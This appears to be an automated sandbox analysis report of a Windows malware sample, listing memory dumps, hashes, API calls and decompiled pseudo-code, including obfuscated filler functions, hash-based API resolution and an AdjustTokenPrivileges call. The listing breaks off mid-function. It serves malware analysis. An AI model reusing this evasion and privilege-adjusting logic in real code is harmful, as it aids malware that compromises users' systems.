                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
                                                                • Instruction ID: 7c9f4eb4d69ea50e1627aeef6434abfc987303a6ddcf60202bbba4239253abed
                                                                • Opcode Fuzzy Hash: 8db077be36dd7dd0c03fe44961d1943ba693b2158ba0f316bbeb6675301aaf28
                                                                • Instruction Fuzzy Hash: F0F0AE52D603285AD7335D54E847C67F3B5E75175FF1AA029DC0963150A2B15CCCC6D1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E00352EF0() {
                                                                
                                                                				return  *[fs:0x30];
                                                                			}



                                                                0x00352ef6

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                • Instruction Fuzzy Hash:
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(0041CB9C,?,00406F6A), ref: 004086DF
                                                                • __mtterm.LIBCMT ref: 004086EB
                                                                  • Part of subcall function 004083C3: __decode_pointer.LIBCMT ref: 004083D4
                                                                  • Part of subcall function 004083C3: TlsFree.KERNEL32(0041F0B8,00407006), ref: 004083EE
                                                                • TlsAlloc.KERNEL32 ref: 00408778
                                                                • __init_pointers.LIBCMT ref: 0040879D
                                                                • __encode_pointer.LIBCMT ref: 004087A8
                                                                • __encode_pointer.LIBCMT ref: 004087B8
                                                                • __encode_pointer.LIBCMT ref: 004087C8
                                                                • __encode_pointer.LIBCMT ref: 004087D8
                                                                • __decode_pointer.LIBCMT ref: 004087F9
                                                                • __calloc_crt.LIBCMT ref: 00408812
                                                                • __decode_pointer.LIBCMT ref: 0040882C
                                                                • GetCurrentThreadId.KERNEL32 ref: 00408842
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154753480.0000000000366000.00000020.00020000.sdmp, Offset: 00366000, based on PE: false
                                                                Similarity
                                                                • API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__mtterm
                                                                • String ID:
                                                                • API String ID: 802150526-0
                                                                • Opcode ID: d942aefd815ff2ac69463fe77aa07f84b4ef650a78de4c33d7cc18a12693ac18
                                                                • Instruction ID: 2f5aaa7c34e191795235447b0fdb2a847fec4bc1545d4251e6e6e981da829176
                                                                • Opcode Fuzzy Hash: d942aefd815ff2ac69463fe77aa07f84b4ef650a78de4c33d7cc18a12693ac18
                                                                • Instruction Fuzzy Hash: F931A2B19413009ACB10BF75BE05B973BA0AF84754B11993FE5A0E22E1DF79A580CB5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __lock.LIBCMT ref: 0040887B
                                                                  • Part of subcall function 0040B081: __mtinitlocknum.LIBCMT ref: 0040B095
                                                                  • Part of subcall function 0040B081: __amsg_exit.LIBCMT ref: 0040B0A1
                                                                  • Part of subcall function 0040B081: RtlEnterCriticalSection.NTDLL(?), ref: 0040B0A9
                                                                • ___sbh_find_block.LIBCMT ref: 00408886
                                                                • ___sbh_free_block.LIBCMT ref: 00408895
                                                                • HeapFree.KERNEL32(00000000,?,0041DDA8), ref: 004088C5
                                                                • GetLastError.KERNEL32(?,004088F8,?,00000001,?,0040B00B,00000018,0041DE68,0000000C,0040B09A,?,?,?,004085D2,0000000D,0041DD80), ref: 004088D6
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154753480.0000000000366000.00000020.00020000.sdmp, Offset: 00366000, based on PE: false
                                                                Similarity
                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 2714421763-0
                                                                • Opcode ID: 7cf3a84ba247bcb1ec6eed254aa455275ae888908476a6adfc563ed9a2df6adb
                                                                • Instruction ID: 0c8aa496af349cf9735c716c44df84aa03bd12a4e994b500c6f705cadb9d65b7
                                                                • Opcode Fuzzy Hash: 7cf3a84ba247bcb1ec6eed254aa455275ae888908476a6adfc563ed9a2df6adb
                                                                • Instruction Fuzzy Hash: 8B01A732900301AADB207BB2AD06B8F3A64DF44328F60803FF894761D1CF7D89819B9D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E00342340(char _a4) {
                                                                				signed int _v20;
                                                                				struct HDC__* _v24;
                                                                				signed int _v28;
                                                                				signed int _t28;
                                                                				signed int _t29;
                                                                				signed int _t30;
                                                                				struct HWND__* _t32;
                                                                				int _t34;
                                                                				struct HWND__* _t35;
                                                                				signed int _t36;
                                                                				signed int _t39;
                                                                				int _t42;
                                                                				signed int _t48;
                                                                				signed int _t49;
                                                                				signed int _t54;
                                                                				void* _t56;
                                                                				signed int _t58;
                                                                				int _t59;
                                                                
                                                                				_t1 =  &_a4; // 0x342f73
                                                                				_t56 =  *_t1;
                                                                				_t34 = _t56 & 0x00000100;
                                                                				RegEnumValueW(_t56, _t34, _t34, _t56 & 0xfffffeff, _t34, _t56 & 0xfffffeff, _t56, _t34);
                                                                				_t35 = _t34 * _t56;
                                                                				_t39 = 0;
                                                                				if(_t35 != _t56) {
                                                                					_t36 = _t35 | _t56;
                                                                					_t32 = _t36 * _t56;
                                                                					_t39 = _t36 * _t32 | _t32;
                                                                					_t35 = _t32;
                                                                				}
                                                                				_t54 = _t39 ^ _t56;
                                                                				DestroyWindow(_t35);
                                                                				_t58 = _t39 * _t54;
                                                                				_v20 = _t58;
                                                                				_t3 =  &_a4; // 0x342f73
                                                                				_t59 =  *_t3;
                                                                				_t42 = _t58 - _t59;
                                                                				if(_t59 == 0xaec9ea02 && _t35 != 0xaec9ea02) {
                                                                					_t48 = _t42 * _t35;
                                                                					_t5 = _t54 - 0x513615fe; // -1362499070
                                                                					_t49 = _t48 + _t5;
                                                                					_t42 = _t48 + 0xaec9ea02;
                                                                					_v24 = _t49;
                                                                					_t28 = _t54 * _t49;
                                                                					_v28 = _t28;
                                                                					_t29 = _t28 + 0xc9;
                                                                					_t30 = _t29 * _t35;
                                                                					_t35 = _t29 * _t35 >> 0x20;
                                                                					_v20 = _t30;
                                                                				}
                                                                				if(_t35 >= _t59 && _t42 != _t59) {
                                                                					MoveToEx(_v24, _t59, _t42, _t59);
                                                                					return ((_v28 ^ (_t35 + _v20 & 0x000000ff) * 0xffffffe3) << 0x18) + 0x2a000000 >> 0x18;
                                                                				}
                                                                				return 0;
                                                                			}





















                                                                0x00342349
                                                                0x00342349
                                                                0x0034234e
                                                                0x00342363
                                                                0x00342369
                                                                0x0034236c
                                                                0x00342370
                                                                0x00342372
                                                                0x00342376
                                                                0x0034237e
                                                                0x00342381
                                                                0x00342381
                                                                0x00342385
                                                                0x0034238a
                                                                0x00342390
                                                                0x00342393
                                                                0x00342398
                                                                0x00342398
                                                                0x0034239e
                                                                0x003423a6
                                                                0x003423b2
                                                                0x003423b5
                                                                0x003423b5
                                                                0x003423bc
                                                                0x003423c2
                                                                0x003423c5
                                                                0x003423c8
                                                                0x003423d0
                                                                0x003423d2
                                                                0x003423d4
                                                                0x003423d6
                                                                0x003423d6
                                                                0x003423e2
                                                                0x003423ee
                                                                0x00000000
                                                                0x00342410
                                                                0x00342419

                                                                APIs
                                                                • RegEnumValueW.ADVAPI32(s/4,s/4,s/4,s/4,s/4,s/4,s/4,s/4,?,00342F73,?,?,?,?,?,0034AE51), ref: 00342363
                                                                • DestroyWindow.USER32 ref: 0034238A
                                                                • MoveToEx.GDI32(00000000,s/4,00000000,s/4), ref: 003423EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: DestroyEnumMoveValueWindow
                                                                • String ID: s/4
                                                                • API String ID: 1329181790-2589901763
                                                                • Opcode ID: dbef05bcc233290ce0eb9b52e4f7f1d4edef9a9c088eca60737e5fecb0b22855
                                                                • Instruction ID: cdd0a7dd25eba2511fedd9e3674035bc63e0eb9a0b96dcdbe8261d3c50e9f699
                                                                • Opcode Fuzzy Hash: dbef05bcc233290ce0eb9b52e4f7f1d4edef9a9c088eca60737e5fecb0b22855
                                                                • Instruction Fuzzy Hash: 852129717002355F8B1D8AA98CD66BFBEEDEB88760B05413BF406EF691E5A45D4182E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E003446E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
                                                                				signed int _v20;
                                                                				signed int _t33;
                                                                				int _t34;
                                                                				signed int _t45;
                                                                				struct tagRECT* _t46;
                                                                				signed char _t47;
                                                                				signed int _t48;
                                                                				WCHAR* _t49;
                                                                				struct HWND__* _t50;
                                                                				signed char _t51;
                                                                				signed char _t55;
                                                                				signed int _t57;
                                                                				signed int _t58;
                                                                				signed int _t59;
                                                                				signed int _t62;
                                                                				struct _LUID* _t63;
                                                                				signed int _t64;
                                                                				signed int _t71;
                                                                				int _t73;
                                                                				signed int _t75;
                                                                				signed int _t81;
                                                                				signed int _t82;
                                                                				struct HDC__* _t83;
                                                                				signed int _t84;
                                                                
                                                                				_t73 = _a12;
                                                                				_t83 = _a8;
                                                                				_t45 = _t83 * 0x59;
                                                                				_t46 = _t45 ^ 0x000000fa;
                                                                				_t47 = _t46 & (_t45 ^ 0x00000023);
                                                                				OffsetRect(_t46, _t73, _t73);
                                                                				_t55 = _t47 + 0xbd;
                                                                				_t57 = (_t55 ^ _t47) + _t47;
                                                                				_t48 = _t55;
                                                                				_v20 = _t57;
                                                                				_t58 = _t57;
                                                                				_t75 = (_t58 + _t83) * _t48;
                                                                				if(_t83 != _t73 || _t58 >= _a8) {
                                                                					_t84 = _t75;
                                                                					_t49 = _t48 + _t84;
                                                                					_t83 = _t84 + _t49;
                                                                					LookupPrivilegeValueW(_t49, _t83, _a4);
                                                                					_t59 = _t83 + _t49;
                                                                					_t75 = _t59 | _t49;
                                                                					_t33 = _t49;
                                                                					_t48 = _t83;
                                                                					if(_a4 == 0xd9f29025) {
                                                                						goto L3;
                                                                					}
                                                                				} else {
                                                                					_t59 = _v20;
                                                                					if(_a4 != 0xd9f29025) {
                                                                						L7:
                                                                						_v20 = _t59;
                                                                						if(_t59 != _a12) {
                                                                							L11:
                                                                							_t34 = _a4;
                                                                							_t50 = _t48 + _t34;
                                                                							EndDialog(_t50, _t34);
                                                                							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
                                                                							_t62 = _t81 * _t50;
                                                                							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
                                                                							_t33 = _t50;
                                                                							_t48 = _t81;
                                                                							L12:
                                                                							if(_a8 == _a12) {
                                                                								_t82 = _t62;
                                                                								_t63 = _a4;
                                                                								if(_t63 != _a8 && _t33 != _t63) {
                                                                									SetTextColor(_t83, _a12);
                                                                									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
                                                                								}
                                                                							}
                                                                							return _t48;
                                                                						}
                                                                						_t64 = _t75;
                                                                						if(_t64 != _a12 || _t64 == _a4) {
                                                                							goto L11;
                                                                						} else {
                                                                							_t62 = _v20;
                                                                							goto L12;
                                                                						}
                                                                					}
                                                                					L3:
                                                                					if(_a8 != 0xd9f29025) {
                                                                						_t71 = _t59;
                                                                						if(_t71 == _a8) {
                                                                							_t59 = _t71;
                                                                						} else {
                                                                							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
                                                                							_t51 = _t48 + _t33;
                                                                							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
                                                                							_t59 = _t51 * _t83;
                                                                							_t48 = _t59 * 0x6c000000 >> 0x18;
                                                                						}
                                                                					}
                                                                				}
                                                                			}



























                                                                0x003446e7
                                                                0x003446ea
                                                                0x003446ed
                                                                0x003446f4
                                                                0x003446fa
                                                                0x003446ff
                                                                0x00344709
                                                                0x00344711
                                                                0x00344713
                                                                0x00344715
                                                                0x00344718
                                                                0x00344720
                                                                0x00344725
                                                                0x00344781
                                                                0x00344784
                                                                0x00344786
                                                                0x00344791
                                                                0x0034479a
                                                                0x0034479f
                                                                0x003447a1
                                                                0x003447a3
                                                                0x003447ab
                                                                0x00000000
                                                                0x00000000
                                                                0x0034472c
                                                                0x00344731
                                                                0x0034473a
                                                                0x003447ad
                                                                0x003447ad
                                                                0x003447b6
                                                                0x003447ca
                                                                0x003447ca
                                                                0x003447cd
                                                                0x003447d1
                                                                0x003447e2
                                                                0x003447e7
                                                                0x003447f9
                                                                0x003447fc
                                                                0x003447fe
                                                                0x00344800
                                                                0x00344806
                                                                0x00344808
                                                                0x0034480a
                                                                0x00344810
                                                                0x0034481d
                                                                0x00344838
                                                                0x00344838
                                                                0x00344810
                                                                0x00344844
                                                                0x00344844
                                                                0x003447b8
                                                                0x003447be
                                                                0x00000000
                                                                0x003447c5
                                                                0x003447c5
                                                                0x00000000
                                                                0x003447c5
                                                                0x003447be
                                                                0x0034473c
                                                                0x00344743
                                                                0x00344745
                                                                0x0034474d
                                                                0x00344845
                                                                0x00344753
                                                                0x0034475d
                                                                0x00344760
                                                                0x0034476d
                                                                0x00344773
                                                                0x0034477c
                                                                0x0034477c
                                                                0x0034474d
                                                                0x00344743

                                                                APIs
                                                                • OffsetRect.USER32 ref: 003446FF
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,-00361D33,?), ref: 00344791
                                                                • EndDialog.USER32 ref: 003447D1
                                                                • SetTextColor.GDI32(-02881D33,-040C1D33), ref: 0034481D
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
                                                                • String ID:
                                                                • API String ID: 2289036324-0
                                                                • Opcode ID: 60af958505bc0ecc23384d500c14459a69031dea22b80589edb6a77253a5e070
                                                                • Instruction ID: 3a252e99f56254c432fba719f06405de324a883a69c1c41c74df4a7be1bacbd7
                                                                • Opcode Fuzzy Hash: 60af958505bc0ecc23384d500c14459a69031dea22b80589edb6a77253a5e070
                                                                • Instruction Fuzzy Hash: 46410533B005245BDB19CE58CCE06BF7BEAEB95351B178139E8299B740C271BD468780
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E003429D0(void* __eax, struct HWND__* _a4) {
                                                                				int _v20;
                                                                				signed int _t14;
                                                                				struct HDC__* _t21;
                                                                				signed int _t26;
                                                                				signed int _t28;
                                                                				long _t29;
                                                                				void* _t32;
                                                                				struct HWND__* _t33;
                                                                				signed int _t37;
                                                                				signed int _t38;
                                                                				struct HDC__* _t40;
                                                                				struct HWND__* _t42;
                                                                				signed int _t43;
                                                                				void* _t44;
                                                                				void** _t46;
                                                                
                                                                				_t33 = _a4;
                                                                				_t26 = _t33 + (_t33 & 0x00000004);
                                                                				_t40 = _t26 * 0x6e;
                                                                				DeleteDC(_t40);
                                                                				_t14 = _t33 * _t40 * _t26;
                                                                				_t42 = _t40 + _t14 ^ 0x00000191;
                                                                				if(_t33 == 0x191 || _t42 != _t33) {
                                                                					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
                                                                					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
                                                                					_t14 = (_t2 | 0x00000383) * 0x383;
                                                                				}
                                                                				_v20 = _t14;
                                                                				_t43 = _t42 * _t14;
                                                                				_t4 = _t43 + 0x368; // -3529163
                                                                				_t28 = _t4 - _t14;
                                                                				_t37 = _t28 ^ _t43;
                                                                				_t6 = _t43 + 0x368; // -3528291
                                                                				_t44 = _t37 + _t6;
                                                                				ResetEvent(_t44);
                                                                				_t29 = _t28 ^ _t44;
                                                                				_t38 = _t37 | _t29;
                                                                				_t32 = _t38 & _t44;
                                                                				_t7 = _t32 + 0x31; // -3529114
                                                                				_t21 = _t7 * _t44;
                                                                				_t46 = (_t21 + _t29) * _t38;
                                                                				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
                                                                				return _t46 * _t32;
                                                                			}


















                                                                0x003429d7
                                                                0x003429df
                                                                0x003429e1
                                                                0x003429e5
                                                                0x003429f0
                                                                0x003429f5
                                                                0x00342a01
                                                                0x00342a17
                                                                0x00342a1f
                                                                0x00342a2b
                                                                0x00342a2b
                                                                0x00342a31
                                                                0x00342a34
                                                                0x00342a37
                                                                0x00342a3d
                                                                0x00342a41
                                                                0x00342a43
                                                                0x00342a43
                                                                0x00342a4b
                                                                0x00342a51
                                                                0x00342a53
                                                                0x00342a57
                                                                0x00342a59
                                                                0x00342a5c
                                                                0x00342a62
                                                                0x00342a6f
                                                                0x00342a81

                                                                APIs
                                                                • DeleteDC.GDI32(-0035DD33), ref: 003429E5
                                                                • SetWindowPos.USER32(-0035DD33,00347BEC,00000191,00347BEC,00347BEC,00347BEC,00000191), ref: 00342A1F
                                                                • ResetEvent.KERNEL32(-0035D663,?,00347BEC,-00361FA0,-040C1D33,-00361D33,?,00349287,-00361D33,?,003477A1,00000001,?,-00361D33,?,00346A74), ref: 00342A4B
                                                                • CreateDIBSection.GDI32(-0035D99A,-0035D99A,-0035D9CB,-0035D663,-0035D9CB,-0035D9CB), ref: 00342A6F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154716833.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                                • Associated: 00000004.00000002.2154709625.0000000000340000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154736980.0000000000360000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154743031.0000000000362000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000004.00000002.2154748744.0000000000365000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CreateDeleteEventResetSectionWindow
                                                                • String ID:
                                                                • API String ID: 201249963-0
                                                                • Opcode ID: 3e62d69aa6941cacd008a4f29533f4f47bb21eaeb3d587e9701f98015a9ef095
                                                                • Instruction ID: 4b109066157e9915d7851398a6baeebeb47828e42c47765f1ea75c63d74ba1fe
                                                                • Opcode Fuzzy Hash: 3e62d69aa6941cacd008a4f29533f4f47bb21eaeb3d587e9701f98015a9ef095
                                                                • Instruction Fuzzy Hash: 59110873B002247FD7254A5ADC49EDBBA5EE7C9710F060126FC49EB150D9706F0586E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154753480.0000000000366000.00000020.00020000.sdmp, Offset: 00366000, based on PE: false
                                                                Similarity
                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                • String ID:
                                                                • API String ID: 3016257755-0
                                                                • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                • Instruction ID: f1d188cd89e75039e5349c1bf5f0c23454c91bbd64c1dae144738a6ce59fdc2e
                                                                • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                • Instruction Fuzzy Hash: 5001553280814EBBCF165E85CC41CEE3F22BF18394F548466FE1865171D73AE971AB86
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 00408537: __getptd_noexit.LIBCMT ref: 00408538
                                                                  • Part of subcall function 00408537: __amsg_exit.LIBCMT ref: 00408545
                                                                • __amsg_exit.LIBCMT ref: 00409967
                                                                • __lock.LIBCMT ref: 00409977
                                                                • InterlockedDecrement.KERNEL32(?), ref: 00409994
                                                                • InterlockedIncrement.KERNEL32(0041F598), ref: 004099BF
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154753480.0000000000366000.00000020.00020000.sdmp, Offset: 00366000, based on PE: false
                                                                Similarity
                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                • String ID:
                                                                • API String ID: 2880340415-0
                                                                • Opcode ID: 624f8b6ce56c012877ac69b45c4303691cc46d7931f467300d03cfb7e3043e13
                                                                • Instruction ID: 1c36347a2b57b142d11ab1b74aa259463948581b2557adecd528933622847893
                                                                • Opcode Fuzzy Hash: 624f8b6ce56c012877ac69b45c4303691cc46d7931f467300d03cfb7e3043e13
                                                                • Instruction Fuzzy Hash: 2A015E72900711ABD620AB669805B9A7660BB08715F15413FF81877BD2CB3C6D82CBDE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(0041CB9C,0041DD60,0000000C,00408512,00000000,00000000,?,004088F8,?,00000001,?,0040B00B,00000018,0041DE68,0000000C,0040B09A), ref: 00408411
                                                                • InterlockedIncrement.KERNEL32(0041F170), ref: 0040846C
                                                                • __lock.LIBCMT ref: 00408474
                                                                • ___addlocaleref.LIBCMT ref: 00408493
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2154753480.0000000000366000.00000020.00020000.sdmp, Offset: 00366000, based on PE: false
                                                                Similarity
                                                                • API ID: HandleIncrementInterlockedModule___addlocaleref__lock
                                                                • String ID:
                                                                • API String ID: 2801583907-0
                                                                • Opcode ID: 4da17bb71387dd3923f09f72eaa94a56931078311d9c8986fed88bfa8f14198d
                                                                • Instruction ID: d3226695c1c308a353994ec922bdcd5ee4bb08aa4fdb537c1c7a70936c8058d6
                                                                • Opcode Fuzzy Hash: 4da17bb71387dd3923f09f72eaa94a56931078311d9c8986fed88bfa8f14198d
                                                                • Instruction Fuzzy Hash: F1115E709407019ED720DF75DC45B9ABBE0EF08314F20853EE5A9A72D2DBB8A9858F58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Executed Functions

                                                                C-Code - Quality: 60%
                                                                			E000E9C90(void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                				void* _v20;
                                                                				intOrPtr _v24;
                                                                				struct _TOKEN_PRIVILEGES _v36;
                                                                				intOrPtr* _t14;
                                                                				intOrPtr* _t15;
                                                                				void* _t16;
                                                                				void* _t17;
                                                                				intOrPtr* _t21;
                                                                				void* _t22;
                                                                				intOrPtr* _t23;
                                                                				void* _t26;
                                                                				int _t29;
                                                                				intOrPtr* _t30;
                                                                				void* _t31;
                                                                				void* _t32;
                                                                				intOrPtr* _t34;
                                                                				signed char _t36;
                                                                				signed int _t37;
                                                                				signed int _t38;
                                                                				void** _t40;
                                                                				void* _t46;
                                                                				void* _t48;
                                                                				void* _t49;
                                                                
                                                                				_t14 = E000DBF50(__eflags, 9, 0xbe1ef6e);
                                                                				_t15 = E000DBF50(__eflags, 0, 0x160d384);
                                                                				_t48 = _t46 + 0x10;
                                                                				_t16 =  *_t15();
                                                                				_t40 =  &_v20;
                                                                				_t17 =  *_t14(_t16, 0x20, 0, _t40);
                                                                				_t57 = _t17;
                                                                				if(_t17 != 0) {
                                                                					L2:
                                                                					_v36.PrivilegeCount = 1;
                                                                					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
                                                                					_t21 = E000DBF50(_t58, 9, 0xa2414e7);
                                                                					_t49 = _t48 + 8;
                                                                					_t22 =  *_t21(0, _a4,  &(_v36.Privileges));
                                                                					_t59 = _t22;
                                                                					if(_t22 == 0) {
                                                                						L5:
                                                                						_t38 = 0;
                                                                						__eflags = 0;
                                                                					} else {
                                                                						_t26 = E000D9D50(0x647400a5);
                                                                						E000DBF50(_t59, _t26, E000D9D50(0x68f91a9f));
                                                                						_t49 = _t49 + 0x10;
                                                                						_t29 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
                                                                						_t60 = _t29;
                                                                						if(_t29 == 0) {
                                                                							goto L5;
                                                                						} else {
                                                                							_t30 = E000DBF50(_t60, 0, 0xc702be2);
                                                                							_t49 = _t49 + 8;
                                                                							_t31 =  *_t30();
                                                                							_t61 = _t31;
                                                                							_t38 = _t37 & 0xffffff00 | _t31 == 0x00000000;
                                                                						}
                                                                					}
                                                                					_t23 = E000DBF50(_t61, 0, 0xb8e7db5);
                                                                					 *_t23(_v20);
                                                                				} else {
                                                                					_t32 = E000D9D50(0x647400a5);
                                                                					_t34 = E000DBF50(_t57, _t32, E000D9D50(0x6b5f7e12));
                                                                					_t36 = E000D55C0( *_t34(0xffffffff, 0x20, _t40), 0);
                                                                					_t48 = _t48 + 0x18;
                                                                					_t58 = _t36 & 0x00000001;
                                                                					if((_t36 & 0x00000001) != 0) {
                                                                						_t38 = 0;
                                                                						__eflags = 0;
                                                                					} else {
                                                                						goto L2;
                                                                					}
                                                                				}
                                                                				return _t38;
                                                                			}


























                                                                0x000e9ca0
                                                                0x000e9cb1
                                                                0x000e9cb6
                                                                0x000e9cb9
                                                                0x000e9cbb
                                                                0x000e9cc4
                                                                0x000e9cc6
                                                                0x000e9cc8
                                                                0x000e9d0a
                                                                0x000e9d10
                                                                0x000e9d1f
                                                                0x000e9d29
                                                                0x000e9d2e
                                                                0x000e9d35
                                                                0x000e9d37
                                                                0x000e9d39
                                                                0x000e9d8e
                                                                0x000e9d8e
                                                                0x000e9d8e
                                                                0x000e9d3b
                                                                0x000e9d40
                                                                0x000e9d59
                                                                0x000e9d5e
                                                                0x000e9d70
                                                                0x000e9d72
                                                                0x000e9d74
                                                                0x00000000
                                                                0x000e9d76
                                                                0x000e9d7d
                                                                0x000e9d82
                                                                0x000e9d85
                                                                0x000e9d87
                                                                0x000e9d89
                                                                0x000e9d89
                                                                0x000e9d74
                                                                0x000e9d97
                                                                0x000e9da2
                                                                0x000e9cca
                                                                0x000e9ccf
                                                                0x000e9ce8
                                                                0x000e9cfa
                                                                0x000e9cff
                                                                0x000e9d02
                                                                0x000e9d04
                                                                0x000e9da6
                                                                0x000e9da6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000e9d04
                                                                0x000e9db1

                                                                APIs
                                                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000E9D70
                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: AdjustLibraryLoadPrivilegesToken
                                                                • String ID:
                                                                • API String ID: 1509250347-0
                                                                • Opcode ID: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
                                                                • Instruction ID: f4c11f273fe8c95a9de9c677c0c0e36ac4e6a47c91d6fcfa66264891efa99fb6
                                                                • Opcode Fuzzy Hash: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
                                                                • Instruction Fuzzy Hash: EE21F3A2E443597AEB6036F1AC03FFE3558DB51715F0A0035FD18B52C7FA91AA1485B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 88%
                                                                			E000D1AF0(void* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                				long _v20;
                                                                				char _v24;
                                                                				intOrPtr _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _t24;
                                                                				void* _t27;
                                                                				int _t31;
                                                                				signed char _t32;
                                                                				intOrPtr* _t33;
                                                                				intOrPtr _t38;
                                                                				intOrPtr* _t40;
                                                                				void* _t41;
                                                                				intOrPtr _t42;
                                                                				intOrPtr _t43;
                                                                				intOrPtr _t50;
                                                                				intOrPtr* _t54;
